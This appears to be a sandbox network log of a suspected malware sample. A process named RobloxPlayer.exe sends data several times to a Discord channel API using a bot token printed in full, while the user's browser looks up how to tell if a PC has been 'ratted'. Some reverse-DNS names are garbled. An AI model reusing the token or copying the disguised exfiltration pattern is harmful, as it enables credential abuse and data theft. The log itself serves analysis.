
IN AAAA

2a00:1450:4009:81d::200e
DNS

246.212.58.216.in-addr.arpa

Remote address:

8.8.8.8:53

Request

246.212.58.216.in-addr.arpa

IN PTR

Response

246.212.58.216.in-addr.arpa

IN PTR

lhr25s28-in-f221e100net

246.212.58.216.in-addr.arpa

IN PTR

ams16s22-in-f22�I

246.212.58.216.in-addr.arpa

IN PTR

ams16s22-in-f246�I
DNS

238.179.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

238.179.250.142.in-addr.arpa

IN PTR

Response

238.179.250.142.in-addr.arpa

IN PTR

lhr25s31-in-f141e100net
DNS

www.reddit.com

firefox.exe

Remote address:

8.8.8.8:53

Request

www.reddit.com

IN A

Response

www.reddit.com

IN CNAME

reddit.map.fastly.net

reddit.map.fastly.net

IN A

151.101.1.140

reddit.map.fastly.net

IN A

151.101.65.140

reddit.map.fastly.net

IN A

151.101.129.140

reddit.map.fastly.net

IN A

151.101.193.140
GET

https://www.reddit.com/r/techsupport/comments/5cxbao/how_can_i_tell_if_ive_been_ratted/

firefox.exe

Remote address:

151.101.1.140:443

Request

GET /r/techsupport/comments/5cxbao/how_can_i_tell_if_ive_been_ratted/ HTTP/2.0
host: www.reddit.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://www.google.com/
upgrade-insecure-requests: 1
sec-fetch-dest: document
sec-fetch-mode: navigate
sec-fetch-site: cross-site
sec-fetch-user: ?1
te: trailers

Response

HTTP/2.0 403

retry-after: 0
content-type: text/html
cache-control: private, no-store
accept-ranges: bytes
date: Sun, 26 May 2024 02:05:45 GMT
via: 1.1 varnish
strict-transport-security: max-age=31536000; includeSubdomains
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-xss-protection: 1; mode=block
set-cookie: edgebucket=eg1TngcjkkapVYhFwQ; Domain=reddit.com; Max-Age=63071999; Path=/; secure
server: snooserv
report-to: {"group": "w3-reporting-nel", "max_age": 14400, "include_subdomains": true, "endpoints": [{ "url": "https://w3-reporting-nel.reddit.com/reports" }]}, {"group": "w3-reporting", "max_age": 14400, "include_subdomains": true, "endpoints": [{ "url": "https://w3-reporting.reddit.com/reports" }]}, {"group": "w3-reporting-csp", "max_age": 14400, "include_subdomains": true, "endpoints": [{ "url": "https://w3-reporting-csp.reddit.com/reports" }]}
nel: {"report_to": "w3-reporting-nel", "max_age": 14400, "include_subdomains": false, "success_fraction": 1.0, "failure_fraction": 1.0}
content-length: 190240
GET

https://www.reddit.com/favicon.ico

firefox.exe

Remote address:

151.101.1.140:443

Request

GET /favicon.ico HTTP/2.0
host: www.reddit.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://www.reddit.com/r/techsupport/comments/5cxbao/how_can_i_tell_if_ive_been_ratted/
cookie: edgebucket=eg1TngcjkkapVYhFwQ
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: same-origin
te: trailers

Response

HTTP/2.0 200

last-modified: Mon, 07 Jan 2019 21:19:55 GMT
etag: "4f450017f68decfda3027242b57e4811"
content-type: image/vnd.microsoft.icon
accept-ranges: bytes
date: Sun, 26 May 2024 02:05:46 GMT
via: 1.1 varnish
strict-transport-security: max-age=31536000; includeSubdomains
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-xss-protection: 1; mode=block
cache-control: public, max-age=86400
server: snooserv
report-to: {"group": "w3-reporting-nel", "max_age": 14400, "include_subdomains": true, "endpoints": [{ "url": "https://w3-reporting-nel.reddit.com/reports" }]}, {"group": "w3-reporting", "max_age": 14400, "include_subdomains": true, "endpoints": [{ "url": "https://w3-reporting.reddit.com/reports" }]}, {"group": "w3-reporting-csp", "max_age": 14400, "include_subdomains": true, "endpoints": [{ "url": "https://w3-reporting-csp.reddit.com/reports" }]}
nel: {"report_to": "w3-reporting-nel", "max_age": 14400, "include_subdomains": false, "success_fraction": 1.0, "failure_fraction": 1.0}
content-length: 2441
DNS

reddit.map.fastly.net

firefox.exe

Remote address:

8.8.8.8:53

Request

reddit.map.fastly.net

IN A

Response

reddit.map.fastly.net

IN A

151.101.1.140

reddit.map.fastly.net

IN A

151.101.65.140

reddit.map.fastly.net

IN A

151.101.129.140

reddit.map.fastly.net

IN A

151.101.193.140
DNS

reddit.map.fastly.net

firefox.exe

Remote address:

8.8.8.8:53

Request

reddit.map.fastly.net

IN AAAA

Response
DNS

140.1.101.151.in-addr.arpa

Remote address:

8.8.8.8:53

Request

140.1.101.151.in-addr.arpa

IN PTR

Response
POST

https://discord.com/api/v9/channels/1244109081116151869/messages

RobloxPlayer.exe

Remote address:

162.159.137.232:443

Request

POST /api/v9/channels/1244109081116151869/messages HTTP/1.1
authorization: Bot MTIxNTQyMjc0OTk4ODg4NDU3Mg.G8QiY3.e2k047pCmhPxBH-tdaOfxVTB1BY3dSfZIT_sXY
Content-Type: multipart/form-data; boundary="9ff6e2cb-3187-4f00-97ff-e0742c454e46"
Host: discord.com
Content-Length: 78189
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sun, 26 May 2024 02:05:56 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
set-cookie: __dcfduid=7d4fd7141b0411efaab55a359d908d37; Expires=Fri, 25-May-2029 02:05:56 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1716689157.569
x-ratelimit-reset-after: 1.000
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0QjNsXgALGBcKiC1hYpxGOuVL3BBwTmNsj7d24EZa%2FEvUIQL3ArpmfqfCzOiZcbYxzD523Qf90zMLUpkVfqwCRZc721L5Mg7recMkV4PfHCrviCkxpUw%2Bu32havT"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=7d4fd7141b0411efaab55a359d908d37a84847da4d525b3cab3b5b200ff6fd43476b74e2289c69eafccebad79c656795; Expires=Fri, 25-May-2029 02:05:56 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=6e046115ae949157abc40e94e51e3aa345c0dabf-1716689156; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=sfP8oNYI6M9bTajS7hDdlsRYFGXtJY.jhJ3OGMEN4tc-1716689156842-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 889a33fb6f8b6377-LHR
DNS

www.youtube.com

firefox.exe

Remote address:

8.8.8.8:53

Request

www.youtube.com

IN A

Response

www.youtube.com

IN CNAME

youtube-ui.l.google.com

youtube-ui.l.google.com

IN A

142.250.187.238

youtube-ui.l.google.com

IN A

142.250.178.14

youtube-ui.l.google.com

IN A

172.217.16.238

youtube-ui.l.google.com

IN A

142.250.200.14

youtube-ui.l.google.com

IN A

142.250.200.46

youtube-ui.l.google.com

IN A

216.58.201.110

youtube-ui.l.google.com

IN A

216.58.204.78

youtube-ui.l.google.com

IN A

216.58.212.206

youtube-ui.l.google.com

IN A

142.250.179.238

youtube-ui.l.google.com

IN A

142.250.180.14

youtube-ui.l.google.com

IN A

142.250.187.206
DNS

youtube-ui.l.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

youtube-ui.l.google.com

IN A

Response

youtube-ui.l.google.com

IN A

142.250.187.238

youtube-ui.l.google.com

IN A

142.250.178.14

youtube-ui.l.google.com

IN A

172.217.16.238

youtube-ui.l.google.com

IN A

142.250.200.14

youtube-ui.l.google.com

IN A

142.250.200.46

youtube-ui.l.google.com

IN A

216.58.201.110

youtube-ui.l.google.com

IN A

216.58.204.78

youtube-ui.l.google.com

IN A

216.58.212.206

youtube-ui.l.google.com

IN A

142.250.179.238

youtube-ui.l.google.com

IN A

142.250.180.14

youtube-ui.l.google.com

IN A

142.250.187.206
DNS

youtube-ui.l.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

youtube-ui.l.google.com

IN AAAA

Response

youtube-ui.l.google.com

IN AAAA

2a00:1450:4009:820::200e

youtube-ui.l.google.com

IN AAAA

2a00:1450:4009:815::200e

youtube-ui.l.google.com

IN AAAA

2a00:1450:4009:821::200e

youtube-ui.l.google.com

IN AAAA

2a00:1450:4009:822::200e
POST

https://discord.com/api/v9/channels/1244109081116151869/messages

RobloxPlayer.exe

Remote address:

162.159.137.232:443

Request

POST /api/v9/channels/1244109081116151869/messages HTTP/1.1
authorization: Bot MTIxNTQyMjc0OTk4ODg4NDU3Mg.G8QiY3.e2k047pCmhPxBH-tdaOfxVTB1BY3dSfZIT_sXY
Content-Type: application/json; charset=utf-8
Host: discord.com
Content-Length: 31
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sun, 26 May 2024 02:05:57 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
set-cookie: __dcfduid=7d7f878e1b0411ef94d15a359d908d37; Expires=Fri, 25-May-2029 02:05:57 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
x-ratelimit-limit: 5
x-ratelimit-remaining: 3
x-ratelimit-reset: 1716689158.570
x-ratelimit-reset-after: 1.501
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QPl1tWUIiqR3%2FfEagOFIbtTuhmUtl2bFElEvWW9WSUAp9d%2FeL9tPnoRmJ8x8ovCT9wbmaUs6k6LxhYXWxN8%2B7j0DO2rZg%2BPt6Md7cSiyahxf893%2FzFkyARsZesNo"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=7d7f878e1b0411ef94d15a359d908d37853ab4df1509034e756d9b8ec79dbb3cabb6f57e3ce4ba0a18941f5d6aebcb15; Expires=Fri, 25-May-2029 02:05:57 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=87e2b53b7714dab8f763b4e7f24b08c0444b6f51-1716689157; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=KZMK34q.HvxyDSJdaiPN4hmvB.phvzRPrYqcTMXl85A-1716689157156-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 889a33ff0b4394f9-LHR
DNS

238.187.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

238.187.250.142.in-addr.arpa

IN PTR

Response

238.187.250.142.in-addr.arpa

IN PTR

lhr25s34-in-f141e100net
DNS

googleads.g.doubleclick.net

firefox.exe

Remote address:

8.8.8.8:53

Request

googleads.g.doubleclick.net

IN A

Response

googleads.g.doubleclick.net

IN A

216.58.201.98
DNS

static.doubleclick.net

firefox.exe

Remote address:

8.8.8.8:53

Request

static.doubleclick.net

IN A

Response

static.doubleclick.net

IN A

216.58.213.6
GET

https://googleads.g.doubleclick.net/pagead/id

firefox.exe

Remote address:

216.58.201.98:443

Request

GET /pagead/id HTTP/2.0
host: googleads.g.doubleclick.net
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
origin: https://www.youtube.com
referer: https://www.youtube.com/
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: cross-site
te: trailers
DNS

googleads.g.doubleclick.net

firefox.exe

Remote address:

8.8.8.8:53

Request

googleads.g.doubleclick.net

IN A

Response

googleads.g.doubleclick.net

IN A

142.250.178.2
GET

https://static.doubleclick.net/instream/ad_status.js

firefox.exe

Remote address:

216.58.213.6:443

Request

GET /instream/ad_status.js HTTP/2.0
host: static.doubleclick.net
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://www.youtube.com/
sec-fetch-dest: script
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers
DNS

static.doubleclick.net

firefox.exe

Remote address:

8.8.8.8:53

Request

static.doubleclick.net

IN A

Response

static.doubleclick.net

IN A

216.58.213.6
DNS

static.doubleclick.net

firefox.exe

Remote address:

8.8.8.8:53

Request

static.doubleclick.net

IN AAAA

Response

static.doubleclick.net

IN AAAA

2a00:1450:4009:816::2006
DNS

googleads.g.doubleclick.net

firefox.exe

Remote address:

8.8.8.8:53

Request

googleads.g.doubleclick.net

IN AAAA

Response

googleads.g.doubleclick.net

IN AAAA

2a00:1450:4009:826::2002
DNS

jnn-pa.googleapis.com

firefox.exe

Remote address:

8.8.8.8:53

Request

jnn-pa.googleapis.com

IN A

Response

jnn-pa.googleapis.com

IN A

172.217.169.42

jnn-pa.googleapis.com

IN A

142.250.179.234

jnn-pa.googleapis.com

IN A

142.250.180.10

jnn-pa.googleapis.com

IN A

142.250.187.202

jnn-pa.googleapis.com

IN A

142.250.187.234

jnn-pa.googleapis.com

IN A

142.250.178.10

jnn-pa.googleapis.com

IN A

172.217.16.234

jnn-pa.googleapis.com

IN A

142.250.200.10

jnn-pa.googleapis.com

IN A

142.250.200.42

jnn-pa.googleapis.com

IN A

216.58.201.106

jnn-pa.googleapis.com

IN A

216.58.204.74

jnn-pa.googleapis.com

IN A

216.58.213.10

jnn-pa.googleapis.com

IN A

172.217.169.10
OPTIONS

https://jnn-pa.googleapis.com/$rpc/google.internal.waa.v1.Waa/Create

firefox.exe

Remote address:

172.217.169.42:443

Request

OPTIONS /$rpc/google.internal.waa.v1.Waa/Create HTTP/2.0
host: jnn-pa.googleapis.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
access-control-request-method: POST
access-control-request-headers: content-type,x-goog-api-key,x-user-agent
referer: https://www.youtube.com/
origin: https://www.youtube.com
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: cross-site
te: trailers
POST

https://jnn-pa.googleapis.com/$rpc/google.internal.waa.v1.Waa/Create

firefox.exe

Remote address:

172.217.169.42:443

Request

POST /$rpc/google.internal.waa.v1.Waa/Create HTTP/2.0
host: jnn-pa.googleapis.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
x-goog-api-key: AIzaSyDyT5W0Jh49F30Pqqtyfdf7pDLFKLJoAnw
content-type: application/json+protobuf
x-user-agent: grpc-web-javascript/0.1
content-length: 24
origin: https://www.youtube.com
referer: https://www.youtube.com/
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: cross-site
te: trailers
OPTIONS

https://jnn-pa.googleapis.com/$rpc/google.internal.waa.v1.Waa/GenerateIT

firefox.exe

Remote address:

172.217.169.42:443

Request

OPTIONS /$rpc/google.internal.waa.v1.Waa/GenerateIT HTTP/2.0
host: jnn-pa.googleapis.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
access-control-request-method: POST
access-control-request-headers: content-type,x-goog-api-key,x-user-agent
referer: https://www.youtube.com/
origin: https://www.youtube.com
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: cross-site
te: trailers
POST

https://jnn-pa.googleapis.com/$rpc/google.internal.waa.v1.Waa/GenerateIT

firefox.exe

Remote address:

172.217.169.42:443

Request

POST /$rpc/google.internal.waa.v1.Waa/GenerateIT HTTP/2.0
host: jnn-pa.googleapis.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
x-goog-api-key: AIzaSyDyT5W0Jh49F30Pqqtyfdf7pDLFKLJoAnw
content-type: application/json+protobuf
x-user-agent: grpc-web-javascript/0.1
content-length: 1111
origin: https://www.youtube.com
referer: https://www.youtube.com/
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: cross-site
te: trailers
DNS

jnn-pa.googleapis.com

firefox.exe

Remote address:

8.8.8.8:53

Request

jnn-pa.googleapis.com

IN A

Response

jnn-pa.googleapis.com

IN A

172.217.169.42

jnn-pa.googleapis.com

IN A

142.250.179.234

jnn-pa.googleapis.com

IN A

142.250.180.10

jnn-pa.googleapis.com

IN A

142.250.187.202

jnn-pa.googleapis.com

IN A

142.250.187.234

jnn-pa.googleapis.com

IN A

142.250.178.10

jnn-pa.googleapis.com

IN A

172.217.16.234

jnn-pa.googleapis.com

IN A

142.250.200.10

jnn-pa.googleapis.com

IN A

142.250.200.42

jnn-pa.googleapis.com

IN A

216.58.201.106

jnn-pa.googleapis.com

IN A

216.58.204.74

jnn-pa.googleapis.com

IN A

216.58.213.10

jnn-pa.googleapis.com

IN A

172.217.169.10
DNS

jnn-pa.googleapis.com

firefox.exe

Remote address:

8.8.8.8:53

Request

jnn-pa.googleapis.com

IN AAAA

Response

jnn-pa.googleapis.com

IN AAAA

2a00:1450:4009:80a::200a

jnn-pa.googleapis.com

IN AAAA

2a00:1450:4009:819::200a

jnn-pa.googleapis.com

IN AAAA

2a00:1450:4009:81d::200a

jnn-pa.googleapis.com

IN AAAA

2a00:1450:4009:81e::200a
DNS

98.201.58.216.in-addr.arpa

Remote address:

8.8.8.8:53

Request

98.201.58.216.in-addr.arpa

IN PTR

Response

98.201.58.216.in-addr.arpa

IN PTR

prg03s02-in-f21e100net

98.201.58.216.in-addr.arpa

IN PTR

prg03s02-in-f98�G

98.201.58.216.in-addr.arpa

IN PTR

lhr48s48-in-f2�G
DNS

42.169.217.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

42.169.217.172.in-addr.arpa

IN PTR

Response

42.169.217.172.in-addr.arpa

IN PTR

lhr48s08-in-f101e100net
DNS

6.213.58.216.in-addr.arpa

Remote address:

8.8.8.8:53

Request

6.213.58.216.in-addr.arpa

IN PTR

Response

6.213.58.216.in-addr.arpa

IN PTR

ber01s14-in-f61e100net

6.213.58.216.in-addr.arpa

IN PTR

lhr25s25-in-f6�F
POST

https://discord.com/api/v9/channels/1244109081116151869/messages

RobloxPlayer.exe

Remote address:

162.159.137.232:443

Request

POST /api/v9/channels/1244109081116151869/messages HTTP/1.1
authorization: Bot MTIxNTQyMjc0OTk4ODg4NDU3Mg.G8QiY3.e2k047pCmhPxBH-tdaOfxVTB1BY3dSfZIT_sXY
Content-Type: multipart/form-data; boundary="3c77edd6-8ee9-410e-a989-b568a24d8458"
Host: discord.com
Content-Length: 3557
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sun, 26 May 2024 02:06:07 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
set-cookie: __dcfduid=8398b2d01b0411ef80a8620e827ba661; Expires=Fri, 25-May-2029 02:06:07 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1716689168.154
x-ratelimit-reset-after: 1.000
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=17xqbK1ycFtQ8AJ%2BubwvPYWrKQWKPacbyAzVU85cKMmilErpAvWqoAuTnheNmPDLSQLV6p51%2Fuw8%2By%2FtHtPSPYVgZxb7qTaqz%2F1jIqWAeq2UQAuRIeNXkc5yA5rD"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=8398b2d01b0411ef80a8620e827ba6619777ae05b5bd86dc94cbefaf630eab7820c5eb6a86abaa93709b1d64332b68c5; Expires=Fri, 25-May-2029 02:06:07 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=b5cf96762b63e5bac9bf26b3574d313ab742fb2f-1716689167; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=nB8cZUA5rxJkCnWmaS46SgESY797gkeokOYt.zYRgDc-1716689167387-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 889a343dbf0463e0-LHR
POST

https://discord.com/api/v9/channels/1244109081116151869/messages

RobloxPlayer.exe

Remote address:

162.159.137.232:443

Request

POST /api/v9/channels/1244109081116151869/messages HTTP/1.1
authorization: Bot MTIxNTQyMjc0OTk4ODg4NDU3Mg.G8QiY3.e2k047pCmhPxBH-tdaOfxVTB1BY3dSfZIT_sXY
Content-Type: application/json; charset=utf-8
Host: discord.com
Content-Length: 31
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sun, 26 May 2024 02:06:07 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
set-cookie: __dcfduid=83e5b3961b0411ef96f336dc752ccadf; Expires=Fri, 25-May-2029 02:06:07 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
x-ratelimit-limit: 5
x-ratelimit-remaining: 3
x-ratelimit-reset: 1716689169.151
x-ratelimit-reset-after: 1.504
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AN2%2BLcgKbsNvLEqTwWvcWxIikFSujS3F%2Fl903l1yotqeSH0dluX3%2Brb8JmgWpk0NrJk2o8N9YizCxa6MtKDIXmRga9CBELbXjDwCpJOAmkHbpfCWJJov5E45Cxs0"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=83e5b3961b0411ef96f336dc752ccadf04b8996f3ba38da42ca72d11cb65041c3e61d6577b63f34e67a4f8d9fd3c1142; Expires=Fri, 25-May-2029 02:06:07 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=b5cf96762b63e5bac9bf26b3574d313ab742fb2f-1716689167; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=.stQ1r.UDe6uFlsjznVmmHiu2v.n1HOX9lhreShyfqA-1716689167891-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 889a34411ca748cb-LHR
DNS

www.se7ensins.com

firefox.exe

Remote address:

8.8.8.8:53

Request

www.se7ensins.com

IN A

Response

www.se7ensins.com

IN A

104.27.206.87

www.se7ensins.com

IN A

104.27.205.87
GET

https://www.se7ensins.com/forums/threads/how-to-tell-if-youve-been-ratted.470346/

firefox.exe

Remote address:

104.27.206.87:443

Request

GET /forums/threads/how-to-tell-if-youve-been-ratted.470346/ HTTP/2.0
host: www.se7ensins.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://www.google.com/
upgrade-insecure-requests: 1
sec-fetch-dest: document
sec-fetch-mode: navigate
sec-fetch-site: cross-site
sec-fetch-user: ?1
te: trailers

Response

HTTP/2.0 200

date: Sun, 26 May 2024 02:06:10 GMT
content-type: text/html; charset=utf-8
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
last-modified: Sun, 26 May 2024 02:06:10 GMT
expires: Thu, 19 Nov 1981 08:52:00 GMT
cache-control: private, no-cache, max-age=0
link: </styles/fonts/fa/fa-light-300-min.woff2?_v=5.15.3.1710096499>; rel=preload; as=font; crossorigin=anonymous
vary: Accept-Encoding
set-cookie: 7s_from_search=google; path=/; secure
set-cookie: 7s_csrf=eUAxwisG5sIBUT0T; path=/; secure
x-powered-by: centminmod
cf-cache-status: DYNAMIC
server: cloudflare
cf-ray: 889a34517f073858-LHR
content-encoding: br
alt-svc: h3=":443"; ma=86400
DNS

www.se7ensins.com

firefox.exe

Remote address:

8.8.8.8:53

Request

www.se7ensins.com

IN A

Response

www.se7ensins.com

IN A

104.27.205.87

www.se7ensins.com

IN A

104.27.206.87
DNS

www.se7ensins.com

firefox.exe

Remote address:

8.8.8.8:53

Request

www.se7ensins.com

IN AAAA

Response

www.se7ensins.com

IN AAAA

2606:4700:21::681b:ce57

www.se7ensins.com

IN AAAA

2606:4700:21::681b:cd57
DNS

87.206.27.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

87.206.27.104.in-addr.arpa

IN PTR

Response
DNS

cdnjs.cloudflare.com

firefox.exe

Remote address:

8.8.8.8:53

Request

cdnjs.cloudflare.com

IN A

Response

cdnjs.cloudflare.com

IN A

104.17.25.14

cdnjs.cloudflare.com

IN A

104.17.24.14
GET

https://cdnjs.cloudflare.com/ajax/libs/select2/4.0.6-rc.0/css/select2.min.css

firefox.exe

Remote address:

104.17.25.14:443

Request

GET /ajax/libs/select2/4.0.6-rc.0/css/select2.min.css HTTP/2.0
host: cdnjs.cloudflare.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: text/css,*/*;q=0.1
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://www.se7ensins.com/
sec-fetch-dest: style
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers

Response

HTTP/2.0 200

date: Sun, 26 May 2024 02:06:11 GMT
content-type: text/css; charset=utf-8
content-length: 1640
access-control-allow-origin: *
cache-control: public, max-age=30672000
content-encoding: br
etag: "5eb03fcb-3bab"
last-modified: Mon, 04 May 2020 16:16:11 GMT
cf-cdnjs-via: cfworker/kv
cross-origin-resource-policy: cross-origin
timing-allow-origin: *
x-content-type-options: nosniff
vary: Accept-Encoding
cf-cache-status: HIT
age: 104504
expires: Fri, 16 May 2025 02:06:11 GMT
accept-ranges: bytes
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G5xn2zwiB5evVzLF2nf%2FzGCe6UkQR1lisuMlVKDerZtuAcBHxWbhhu0%2BG2DiQg4FwigB%2FkvakxPHaanM2yLbw15bOahVS1jfmoeAmlIkIOA5go7mkZs0fwj4xHac6P6KCDvPptiK"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security: max-age=15780000
server: cloudflare
cf-ray: 889a3458f852778c-LHR
alt-svc: h3=":443"; ma=86400
DNS

cdnjs.cloudflare.com

firefox.exe

Remote address:

8.8.8.8:53

Request

cdnjs.cloudflare.com

IN A

Response

cdnjs.cloudflare.com

IN A

104.17.25.14

cdnjs.cloudflare.com

IN A

104.17.24.14
DNS

cdnjs.cloudflare.com

firefox.exe

Remote address:

8.8.8.8:53

Request

cdnjs.cloudflare.com

IN AAAA

Response

cdnjs.cloudflare.com

IN AAAA

2606:4700::6811:190e

cdnjs.cloudflare.com

IN AAAA

2606:4700::6811:180e
DNS

104.201.58.216.in-addr.arpa

Remote address:

8.8.8.8:53

Request

104.201.58.216.in-addr.arpa

IN PTR

Response

104.201.58.216.in-addr.arpa

IN PTR

prg03s02-in-f81e100net

104.201.58.216.in-addr.arpa

IN PTR

prg03s02-in-f104�H

104.201.58.216.in-addr.arpa

IN PTR

lhr48s48-in-f8�H
DNS

14.25.17.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

14.25.17.104.in-addr.arpa

IN PTR

Response
DNS

ajax.googleapis.com

firefox.exe

Remote address:

8.8.8.8:53

Request

ajax.googleapis.com

IN A

Response

ajax.googleapis.com

IN A

172.217.16.234
DNS

ajax.googleapis.com

firefox.exe

Remote address:

8.8.8.8:53

Request

ajax.googleapis.com

IN A

Response

ajax.googleapis.com

IN A

142.250.200.42
DNS
